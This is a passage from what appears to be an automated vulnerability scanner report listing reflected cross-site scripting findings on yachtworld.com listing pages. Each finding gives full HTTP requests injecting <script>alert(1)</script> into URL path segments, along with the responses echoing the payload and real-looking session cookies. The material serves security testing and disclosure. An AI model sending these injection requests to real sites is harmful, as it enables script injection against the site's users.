F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&588f2"><script>alert(1)</script>9c458a9cc4e=1&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States&boat_id=2255088">
...[SNIP]...

3.113. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac7d"><script>alert(1)</script>cc630271c5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton9ac7d"><script>alert(1)</script>cc630271c5d/MD/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:15 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:15 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2237772&boat_id=2237772&back=/core/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton9ac7d"><script>alert(1)</script>cc630271c5d/MD/United-States&boat_id=2237772">
...[SNIP]...

3.114. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b31"><script>alert(1)</script>b21ecc1901e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD76b31"><script>alert(1)</script>b21ecc1901e/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:42 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2237772&boat_id=2237772&back=/core/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD76b31"><script>alert(1)</script>b21ecc1901e/United-States&boat_id=2237772">
...[SNIP]...

3.115. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9e"><script>alert(1)</script>460982dca51 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States92a9e"><script>alert(1)</script>460982dca51 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:56 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 